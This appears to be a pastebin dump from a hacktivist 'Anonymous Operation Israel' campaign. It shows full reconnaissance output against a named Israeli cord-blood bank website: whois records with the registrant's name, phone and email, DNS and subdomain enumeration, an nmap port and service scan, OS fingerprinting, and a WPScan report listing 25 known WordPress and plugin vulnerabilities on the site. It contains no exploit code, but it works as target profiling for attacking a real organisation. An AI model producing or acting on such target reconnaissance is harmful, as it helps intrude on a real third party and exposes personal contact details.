Anonymous Operation Izsrael USA JTSEC full recon 2018 #7

a guest
Mar 23rd, 2018
  1. #######################################################################################################################################
  2. Hostname www.cord-blood.co.il ISP 012 Smile Communications LTD. (AS9116)
  3. Continent Asia Flag
  4. IL
  5. Country Israel Country Code IL (ISR)
  6. Region Unknown Local time 23 Mar 2018 06:21 IDT
  7. City Unknown Latitude 31.5
  8. IP Address 80.179.142.111 Longitude 34.75
  9. #######################################################################################################################################
  10.  
  11. HostIP:80.179.142.111
  12. HostName:cord-blood.co.il
  13.  
  14. Gathered Inet-whois information for 80.179.142.111
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum: 80.179.141.64 - 80.179.142.255
  19. netname: GOLDENLINES-CO-LOCATION
  20. descr: Please Send Abuse/SPAM complaints To Abuse@012.net.il
  21. country: IL
  22. admin-c: DR5299-RIPE
  23. tech-c: DR5299-RIPE
  24. status: ASSIGNED PA
  25. mnt-by: AS9116-MNT
  26. mnt-by: AS5486-MNT
  27. created: 2017-06-06T09:26:33Z
  28. last-modified: 2017-06-06T09:26:33Z
  29. source: RIPE # Filtered
  30.  
  31. role: DNS REG
  32. remarks: Hostmaster and LIR
  33. remarks: 012 Smile Communications Ltd.
  34. address: Hasivim 25 Petach-Tikva,Israel
  35. nic-hdl: DR5299-RIPE
  36. admin-c: PT5956-RIPE
  37. admin-c: AT14340-RIPE
  38. admin-c: HAI18-RIPE
  39. admin-c: GE1901-RIPE
  40. admin-c: ASH73-RIPE
  41. admin-c: IK2932-RIPE
  42. admin-c: ENT11-RIPE
  43. tech-c: PT5956-RIPE
  44. tech-c: HAI18-RIPE
  45. tech-c: GE1901-RIPE
  46. tech-c: IK2932-RIPE
  47. tech-c: ENT11-RIPE
  48. mnt-by: AS9116-MNT
  49. mnt-by: PARTNERCOM-MNT
  50. created: 2002-09-19T08:35:05Z
  51. last-modified: 2017-10-18T10:49:53Z
  52. source: RIPE # Filtered
  53. abuse-mailbox: abuse@012.net.il
  54.  
  55. % Information related to '80.179.142.0/24AS9116'
  56.  
  57. route: 80.179.142.0/24
  58. descr: Golden Lines
  59. origin: AS9116
  60. mnt-by: AS9116-MNT
  61. created: 2005-06-07T17:23:50Z
  62. last-modified: 2005-06-07T17:23:50Z
  63. source: RIPE
  64.  
  65. % This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)
  66.  
  67.  
  68.  
  69. Gathered Inic-whois information for cord-blood.co.il
  70. ---------------------------------------------------------------------------------------------------------------------------------------
  71. domain: cord-blood.co.il
  72.  
  73. descr: shiran levin
  74. descr: P.o Box 22836
  75. descr: Tel Aviv
  76. descr: 61227
  77. descr: Israel
  78. phone: +972 3 5446364
  79. fax-no: +972 3 5446366
  80. e-mail: shiran AT matan-arts.org.il
  81. admin-c: IS-SL6462-IL
  82. tech-c: IS-ID1078-IL
  83. zone-c: IS-ID1078-IL
  84. nserver: ns1.shivyon.co.il
  85. nserver: ns2.shivyon.co.il
  86. validity: 06-07-2019
  87. DNSSEC: unsigned
  88. status: Transfer Locked
  89. changed: domain-registrar AT isoc.org.il 20090706 (Assigned)
  90.  
  91. person: shiran Levin
  92. address: shiran levin
  93. address: P.o Box 22836
  94. address: Tel Aviv
  95. address: 61227
  96. address: Israel
  97. phone: +972 3 5446364
  98. fax-no: +972 3 5446366
  99. e-mail: shiran AT matan-arts.org.il
  100. nic-hdl: IS-SL6462-IL
  101. changed: domain-registrar AT isoc.org.il 20090706
  102.  
  103. person: Interspace Domreg
  104. address: Interspace Ltd.
  105. address: P.O.Box 8723
  106. address: Netanya
  107. address: 42505
  108. address: Israel
  109. phone: +972 73 2224444
  110. fax-no: +972 73 2224440
  111. e-mail: domreg AT interspace.net
  112. nic-hdl: IS-ID1078-IL
  113. changed: Managing Registrar 20070110
  114. changed: Managing Registrar 20070319
  115. changed: Managing Registrar 20070909
  116. changed: Managing Registrar 20090514
  117. changed: Managing Registrar 20110720
  118. changed: Managing Registrar 20110720
  119. changed: Managing Registrar 20110721
  120. changed: Managing Registrar 20111128
  121. changed: Managing Registrar 20111128
  122. changed: Managing Registrar 20130924
  123. changed: Managing Registrar 20130924
  124. changed: Managing Registrar 20130924
  125. changed: Managing Registrar 20130924
  126. changed: Managing Registrar 20130924
  127. changed: Managing Registrar 20170518
  128. changed: Managing Registrar 20170716
  129.  
  130. registrar name: InterSpace Ltd
  131. registrar info: http://www.internic.co.il
  132.  
  133. % Rights to the data above are restricted by copyright.
  134.  
  135. Gathered Netcraft information for cord-blood.co.il
  136. ---------------------------------------------------------------------------------------------------------------------------------------
  137.  
  138. Retrieving Netcraft.com information for cord-blood.co.il
  139. Netcraft.com Information gathered
  140.  
  141. Gathered Subdomain information for cord-blood.co.il
  142. ---------------------------------------------------------------------------------------------------------------------------------------
  143. Searching Google.com:80...
  144. Searching Altavista.com:80...
  145. Found 0 possible subdomain(s) for host cord-blood.co.il, Searched 0 pages containing 0 results
  146.  
  147. Gathered E-Mail information for cord-blood.co.il
  148. ---------------------------------------------------------------------------------------------------------------------------------------
  149. Searching Google.com:80...
  150. Searching Altavista.com:80...
  151. Found 0 E-Mail(s) for host cord-blood.co.il, Searched 0 pages containing 0 results
  152.  
  153. Gathered TCP Port information for 80.179.142.111
  154. ---------------------------------------------------------------------------------------------------------------------------------------
  155.  
  156. Port State
  157.  
  158. 21/tcp open
  159. 53/tcp open
  160. 80/tcp open
  161. 110/tcp open
  162. 143/tcp open
  163. #######################################################################################################################################
  164. [i] Scanning Site: http://cord-blood.co.il
  165.  
  166.  
  167.  
  168. B A S I C I N F O
  169. =======================================================================================================================================
  170.  
  171.  
  172. [+] Site Title: דם טבורי - תאי גזע להצלת חיים
  173. [+] IP address: 80.179.142.111
  174. [+] Web Server: nginx
  175. [+] CMS: WordPress
  176. [+] Cloudflare: Not Detected
  177. [+] Robots File: Could NOT Find robots.txt!
  178.  
  179.  
  180.  
  181.  
  270. G E O I P L O O K U P
  271. =======================================================================================================================================
  272.  
  273. [i] IP Address: 80.179.142.111
  274. [i] Country: IL
  275. [i] State: N/A
  276. [i] City: N/A
  277. [i] Latitude: 31.500000
  278. [i] Longitude: 34.750000
  279.  
  280.  
  281.  
  282.  
  283. H T T P H E A D E R S
  284. ======================================================================================================================================
  285.  
  286.  
  287. [i] HTTP/1.1 301 Moved Permanently
  288. [i] Server: nginx
  289. [i] Date: Fri, 23 Mar 2018 03:24:09 GMT
  290. [i] Content-Type: text/html; charset=UTF-8
  291. [i] Content-Length: 0
  292. [i] Connection: close
  293. [i] X-Powered-By: PHP/5.2.17
  294. [i] X-Pingback: http://www.cord-blood.co.il/xmlrpc.php
  295. [i] Location: http://www.cord-blood.co.il/
  296. [i] Vary: User-Agent
  297. [i] X-Rocket-Nginx-Bypass: No
  298. [i] HTTP/1.1 200 OK
  299. [i] Server: nginx
  300. [i] Date: Fri, 23 Mar 2018 03:24:19 GMT
  301. [i] Content-Type: text/html; charset=UTF-8
  302. [i] Connection: close
  303. [i] Vary: Accept-Encoding
  304. [i] X-Powered-By: PHP/5.2.17
  305. [i] X-Pingback: http://www.cord-blood.co.il/xmlrpc.php
  306. [i] Vary: Accept-Encoding,User-Agent
  307. [i] X-Rocket-Nginx-Bypass: No
  308.  
  309.  
  310.  
  311.  
  312. D N S L O O K U P
  313. ======================================================================================================================================
  314.  
  315. ;; Truncated, retrying in TCP mode.
  316. cord-blood.co.il. 14400 IN SOA ns1.spd.co.il. hostmaster.cord-blood.co.il. 2016061501 14400 3600 1209600 86400
  317. cord-blood.co.il. 14400 IN NS ns1.spd.co.il.
  318. cord-blood.co.il. 14400 IN NS ns2.spd.co.il.
  319. cord-blood.co.il. 14400 IN A 80.179.142.111
  320. cord-blood.co.il. 14400 IN MX 10 mailgw2.spd.co.il.
  321. cord-blood.co.il. 14400 IN TXT "v=spf1 a mx ip4:80.179.142.111 ~all"
  322.  
  323.  
  324.  
  325.  
  326. S U B N E T C A L C U L A T I O N
  327. =====================================================================================================================================
  328.  
  329. Address = 80.179.142.111
  330. Network = 80.179.142.111 / 32
  331. Netmask = 255.255.255.255
  332. Broadcast = not needed on Point-to-Point links
  333. Wildcard Mask = 0.0.0.0
  334. Hosts Bits = 0
  335. Max. Hosts = 1 (2^0 - 0)
  336. Host Range = { 80.179.142.111 - 80.179.142.111 }
  337.  
  338.  
  339.  
  340. N M A P P O R T S C A N
  341. =======================================================================================================================================
  342.  
  343.  
  344. Starting Nmap 7.01 ( https://nmap.org ) at 2018-03-23 03:24 UTC
  345. Nmap scan report for cord-blood.co.il (80.179.142.111)
  346. Host is up (0.14s latency).
  347. rDNS record for 80.179.142.111: yanir.spd.co.il
  348. PORT STATE SERVICE VERSION
  349. 21/tcp open ftp ProFTPD
  350. 22/tcp filtered ssh
  351. 23/tcp closed telnet
  352. 25/tcp open smtp Exim smtpd
  353. 80/tcp open http nginx
  354. 110/tcp open pop3 Dovecot DirectAdmin pop3d
  355. 143/tcp open imap Dovecot imapd
  356. 443/tcp open ssl/http nginx
  357. 445/tcp closed microsoft-ds
  358. 3389/tcp closed ms-wbt-server
  359.  
  360. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  361. Nmap done: 1 IP address (1 host up) scanned in 17.18 seconds
  362. #####################################################################################################################################
  363. [!] IP Address : 80.179.142.111
  364. [+] Operating System : Windows
  365. [!] www.cord-blood.co.il doesn't seem to use a CMS
  366. [+] Honeypot Probabilty: 30%
  367. --------------------------------------------------------------------------------------------------------------------------------------
  368. [~] Trying to gather whois information for www.cord-blood.co.il
  369. [+] Whois information found
  370. Registrant Name : shiran Levin, Interspace Domreg
  371. Status : Transfer Locked
  372. Dnssec : unsigned
  373. Expiration Date : 2019-07-06 00:00:00
  374. Domain Name : cord-blood.co.il
  375. Phone : +972 3 5446364, +972 73 2224444
  376. Registrar : InterSpace Ltd
  377. Referral Url : http://www.internic.co.il
  378. Name Servers : ns1.shivyon.co.il, ns2.shivyon.co.il
  379. Emails : shiran@matan-arts.org.il, domreg@interspace.net
  380. --------------------------------------------------------------------------------------------------------------------------------------
  393.  
  394. [+] DNS Records
  395.  
  396. [+] Host Records (A)
  397. www.cord-blood.co.ilHTTP: (80.179.142.111) AS9116 012 Smile Communications LTD. Israel
  398.  
  399. [+] TXT Records
  400.  
  401. [+] DNS Map: https://dnsdumpster.com/static/map/cord-blood.co.il.png
  402.  
  403. [>] Initiating 3 intel modules
  404. [>] Loading Alpha module (1/3)
  405. [>] Beta module deployed (2/3)
  406. [>] Gamma module initiated (3/3)
  407. No emails found
  408. No hosts found
  409. [+] Virtual hosts:
  410. ---------------------------------------------------------------------------------------------------------------------------------------
  411. [~] Crawling the target for fuzzable URLs
  412. #######################################################################################################################################
  413. [+] Getting nameservers
  414. 80.179.148.8 - ns2.spd.co.il
  415. 212.199.164.175 - ns1.spd.co.il
  416. [-] Zone transfer failed
  417.  
  418. [+] TXT records found
  419. "v=spf1 a mx ip4:80.179.142.111 ~all"
  420.  
  421. [+] MX records found, added to target list
  422. 10 mailgw2.spd.co.il.
  423.  
  424. [*] Scanning cord-blood.co.il for A records
  425. 80.179.142.111 - cord-blood.co.il
  426. 80.179.142.111 - ftp.cord-blood.co.il
  427. 127.0.0.1 - localhost.cord-blood.co.il
  428. 80.179.142.111 - mail.cord-blood.co.il
  429. 80.179.142.111 - pop.cord-blood.co.il
  430. 80.179.142.111 - smtp.cord-blood.co.il
  431. 80.179.142.111 - www.cord-blood.co.il
  432. #######################################################################################################################################
  433. Ip Address Status Type Domain Name Server
  434. ---------- ------ ---- ----------- ------
  435. 80.179.142.111 200 host ftp.cord-blood.co.il nginx
  436. 127.0.0.1 host localhost.cord-blood.co.il
  437. 80.179.142.111 200 host mail.cord-blood.co.il nginx
  438. 80.179.142.111 200 host pop.cord-blood.co.il nginx
  439. 80.179.142.111 200 host smtp.cord-blood.co.il nginx
  440. 80.179.142.111 200 host www.cord-blood.co.il nginx
  441. ######################################################################################################################################
  442. Original* cord-blood.co.il 80.179.142.111 NS:ns1.spd.co.il MX:mailgw2.spd.co.il
  443.  
  444. Omission cordblood.co.il 212.150.158.108 NS:ns1.hostech.co.il MX:mail.cordblood.co.il
  445.  
  446. Subdomain cord-bloo.d.co.il 37.19.112.17
  447.  
  448. Various cord-blood.co-il.com NS:ns1.dnslink.com
  449. #######################################################################################################################################
  450. [+] URL: http://www.cord-blood.co.il/
  451. [+] Started: Fri Mar 23 00:17:00 2018
  452.  
  453. [!] The WordPress 'http://www.cord-blood.co.il/readme.html' file exists exposing a version number
  454. [+] Interesting header: SERVER: nginx
  455. [+] Interesting header: X-POWERED-BY: PHP/5.2.17
  456. [+] Interesting header: X-ROCKET-NGINX-BYPASS: No
  457.  
  458. [+] WordPress version 2.7.1 (Released on 2009-02-10) identified from stylesheets numbers, advanced fingerprinting, meta generator, sitemap generator, links opml
  459. [!] 25 vulnerabilities identified from the version number
  460.  
  461. [!] Title: WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass
  462. Reference: https://wpvulndb.com/vulnerabilities/6019
  463. Reference: http://www.securityfocus.com/bid/35584/
  464.  
  465. [!] Title: WordPress 2.5 - 3.3.1 XSS in swfupload
  466. Reference: https://wpvulndb.com/vulnerabilities/5999
  467. Reference: http://seclists.org/fulldisclosure/2012/Nov/51
  468. [i] Fixed in: 3.3.2
  469.  
  470. [!] Title: WordPress 1.5.1 - 3.5 XMLRPC Pingback API Internal/External Port Scanning
  471. Reference: https://wpvulndb.com/vulnerabilities/5988
  472. Reference: https://github.com/FireFart/WordpressPingbackPortScanner
  473. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0235
  474. [i] Fixed in: 3.5.1
  475.  
  476. [!] Title: WordPress 1.5.1 - 3.5 XMLRPC pingback additional issues
  477. Reference: https://wpvulndb.com/vulnerabilities/5989
  478. Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
  479.  
  480. [!] Title: WordPress 2.0 - 3.0.1 wp-includes/comment.php Bypass Spam Restrictions
  481. Reference: https://wpvulndb.com/vulnerabilities/6009
  482. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5293
  483. [i] Fixed in: 3.0.2
  484.  
  485. [!] Title: WordPress 2.0 - 3.0.1 Multiple Cross-Site Scripting (XSS) in request_filesystem_credentials()
  486. Reference: https://wpvulndb.com/vulnerabilities/6010
  487. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5294
  488. [i] Fixed in: 3.0.2
  489.  
  490. [!] Title: WordPress 2.0 - 3.0.1 Cross-Site Scripting (XSS) in wp-admin/plugins.php
  491. Reference: https://wpvulndb.com/vulnerabilities/6011
  492. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5295
  493. [i] Fixed in: 3.0.2
  494.  
  495. [!] Title: WordPress 2.0 - 3.0.1 wp-includes/capabilities.php Remote Authenticated Administrator Delete Action Bypass
  496. Reference: https://wpvulndb.com/vulnerabilities/6012
  497. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5296
  498. [i] Fixed in: 3.0.2
  499.  
  500. [!] Title: WordPress 2.0 - 3.0 Remote Authenticated Administrator Add Action Bypass
  501. Reference: https://wpvulndb.com/vulnerabilities/6013
  502. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5297
  503. [i] Fixed in: 3.0
  504.  
  505. [!] Title: WordPress 2.0.3 - 3.9.1 (except 3.7.4 / 3.8.4) CSRF Token Brute Forcing
  506. Reference: https://wpvulndb.com/vulnerabilities/7528
  507. Reference: https://core.trac.wordpress.org/changeset/29384
  508. Reference: https://core.trac.wordpress.org/changeset/29408
  509. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5204
  510. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5205
  511. [i] Fixed in: 3.9.2
  512.  
  513. [!] Title: WordPress <= 4.0 - Long Password Denial of Service (DoS)
  514. Reference: https://wpvulndb.com/vulnerabilities/7681
  515. Reference: http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
  516. Reference: https://wordpress.org/news/2014/11/wordpress-4-0-1/
  517. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9034
  518. Reference: https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_long_password_dos
  519. Reference: https://www.exploit-db.com/exploits/35413/
  520. Reference: https://www.exploit-db.com/exploits/35414/
  521. [i] Fixed in: 4.0.1
  522.  
  523. [!] Title: WordPress <= 4.0 - Server Side Request Forgery (SSRF)
  524. Reference: https://wpvulndb.com/vulnerabilities/7696
  525. Reference: http://www.securityfocus.com/bid/71234/
  526. Reference: https://core.trac.wordpress.org/changeset/30444
  527. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9038
  528. [i] Fixed in: 4.0.1
  529.  
  530. [!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
  531. Reference: https://wpvulndb.com/vulnerabilities/8473
  532. Reference: https://codex.wordpress.org/Version_4.5
  533. Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
  534. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
  535. [i] Fixed in: 4.5
  536.  
  537. [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
  538. Reference: https://wpvulndb.com/vulnerabilities/8520
  539. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
  540. Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
  541. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
  542. [i] Fixed in: 4.5.3
  543.  
  544. [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
  545. Reference: https://wpvulndb.com/vulnerabilities/8615
  546. Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
  547. Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
  548. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
  549. Reference: http://seclists.org/fulldisclosure/2016/Sep/6
  550. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
  551. [i] Fixed in: 4.6.1
  552.  
  553. [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
  554. Reference: https://wpvulndb.com/vulnerabilities/8719
  555. Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
  556. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
  557. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
  558. [i] Fixed in: 4.7.1
  559.  
  560. [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
  561. Reference: https://wpvulndb.com/vulnerabilities/8807
  562. Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
  563. Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
  564. Reference: https://core.trac.wordpress.org/ticket/25239
  565. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
  566.  
  567. [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
  568. Reference: https://wpvulndb.com/vulnerabilities/8815
  569. Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
  570. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  571. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
  572. [i] Fixed in: 4.7.5
  573.  
  574. [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
  575. Reference: https://wpvulndb.com/vulnerabilities/8816
  576. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  577. Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
  578. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
  579. [i] Fixed in: 4.7.5
  580.  
  581. [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
  582. Reference: https://wpvulndb.com/vulnerabilities/8818
  583. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  584. Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
  585. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
  586. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
  587. [i] Fixed in: 4.7.5
  588.  
  589. [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
  590. Reference: https://wpvulndb.com/vulnerabilities/8905
  591. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  592. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  593. Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
  594. [i] Fixed in: 4.8.2
  595.  
  596. [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
  597. Reference: https://wpvulndb.com/vulnerabilities/8906
  598. Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
  599. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  600. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  601. Reference: https://wpvulndb.com/vulnerabilities/8905
  602. [i] Fixed in: 4.7.5
  603.  
  604. [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
  605. Reference: https://wpvulndb.com/vulnerabilities/8941
  606. Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
  607. Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
  608. Reference: https://twitter.com/ircmaxell/status/923662170092638208
  609. Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
  610. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
  611. [i] Fixed in: 4.8.3
  612.  
  613. [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
  614. Reference: https://wpvulndb.com/vulnerabilities/8967
  615. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  616. Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
  617. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
  618. [i] Fixed in: 4.9.1
  619.  
  620. [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
  621. Reference: https://wpvulndb.com/vulnerabilities/9021
  622. Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
  623. Reference: https://github.com/quitten/doser.py
  624. Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
  625. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
  626.  
  627. [+] WordPress theme in use: painter - v1.1
  628.  
  629. [+] Name: painter - v1.1
  630. | Last updated: 2013-10-31T00:00:00.000Z
  631. | Location: http://www.cord-blood.co.il/wp-content/themes/painter/
  632. | Readme: http://www.cord-blood.co.il/wp-content/themes/painter/readme.txt
  633. [!] The version is out of date, the latest version is 2.5
  634. | Style URL: http://www.cord-blood.co.il/wp-content/themes/painter/style.css
  635. | Referenced style.css: http://www.cord-blood.co.il/wp-content/themes/painter/css/style.css
  636. | Theme Name: Painter
  637. | Theme URI: http://www.marcelomesquita.com/tema-painter/
  638. | Description: A simple theme, with solid colors and a few pictures... but highly customizable. The highlight of...
  639. | Author: Marcelo Mesquita
  640. | Author URI: http://www.marcelomesquita.com/
  641.  
  642. [+] Enumerating plugins from passive detection ...
  643. | 1 plugin found:
  644.  
  645. [+] Name: all-in-one-seo-pack - v1.4.6.15
  646. | Last updated: 2018-03-16T01:10:00.000Z
  647. | Location: http://www.cord-blood.co.il/wp-content/plugins/all-in-one-seo-pack/
  648. | Readme: http://www.cord-blood.co.il/wp-content/plugins/all-in-one-seo-pack/readme.txt
  649. [!] The version is out of date, the latest version is 2.4.6.1
  650.  
  651. [!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
  652. Reference: https://wpvulndb.com/vulnerabilities/6888
  653. Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
  654. [i] Fixed in: 2.1.6
  655.  
  656. [!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
  657. Reference: https://wpvulndb.com/vulnerabilities/6889
  658. Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
  659. [i] Fixed in: 2.1.6
  660.  
  661. [!] Title: All in One SEO Pack <= 2.0.3 - XSS
  662. Reference: https://wpvulndb.com/vulnerabilities/6890
  663. Reference: http://packetstormsecurity.com/files/123490/
  664. Reference: http://www.securityfocus.com/bid/62784/
  665. Reference: http://seclists.org/bugtraq/2013/Oct/8
  666. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5988
  667. Reference: https://secunia.com/advisories/55133/
  668. [i] Fixed in: 2.0.3.1
  669.  
  670. [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
  671. Reference: https://wpvulndb.com/vulnerabilities/7881
  672. Reference: http://jvn.jp/en/jp/JVN75615300/index.html
  673. Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
  674. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
  675. [i] Fixed in: 2.2.6
  676.  
  677. [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
  678. Reference: https://wpvulndb.com/vulnerabilities/7916
  679. Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
  680. [i] Fixed in: 2.2.6.2
  681.  
  682. [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
  683. Reference: https://wpvulndb.com/vulnerabilities/8538
  684. Reference: http://seclists.org/fulldisclosure/2016/Jul/23
  685. Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
  686. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
  687. Reference: https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
  688. Reference: https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
  689. [i] Fixed in: 2.3.7
  690.  
  691. [!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)
  692. Reference: https://wpvulndb.com/vulnerabilities/8558
  693. Reference: https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
  694. Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
  695. [i] Fixed in: 2.3.8
  696. #####################################################################################################################################
  697. Server: 10.211.254.254
  698. Address: 10.211.254.254#53
  699.  
  700. Non-authoritative answer:
  701. Name: cord-blood.co.il
  702. Address: 80.179.142.111
  703.  
  704. cord-blood.co.il has address 80.179.142.111
  705. cord-blood.co.il mail is handled by 10 mailgw2.spd.co.il.
  706. ======================================================================================================================================
  707. CHECKING OS FINGERPRINT
  708. ======================================================================================================================================
  709.  
  710. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  711.  
  712. [+] Target is cord-blood.co.il
  713. [+] Loading modules.
  714. [+] Following modules are loaded:
  715. [x] [1] ping:icmp_ping - ICMP echo discovery module
  716. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  717. [x] [3] ping:udp_ping - UDP-based ping discovery module
  718. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  719. [x] [5] infogather:portscan - TCP and UDP PortScanner
  720. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  721. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  722. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  723. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  724. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  725. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  726. [x] [12] fingerprint:smb - SMB fingerprinting module
  727. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  728. [+] 13 modules registered
  729. [+] Initializing scan engine
  730. [+] Running scan engine
  731. [-] ping:tcp_ping module: no closed/open TCP ports known on 80.179.142.111. Module test failed
  732. [-] ping:udp_ping module: no closed/open UDP ports known on 80.179.142.111. Module test failed
  733. [-] No distance calculation. 80.179.142.111 appears to be dead or no ports known
  734. [+] Host: 80.179.142.111 is up (Guess probability: 50%)
  735. [+] Target: 80.179.142.111 is alive. Round-Trip Time: 1.01174 sec
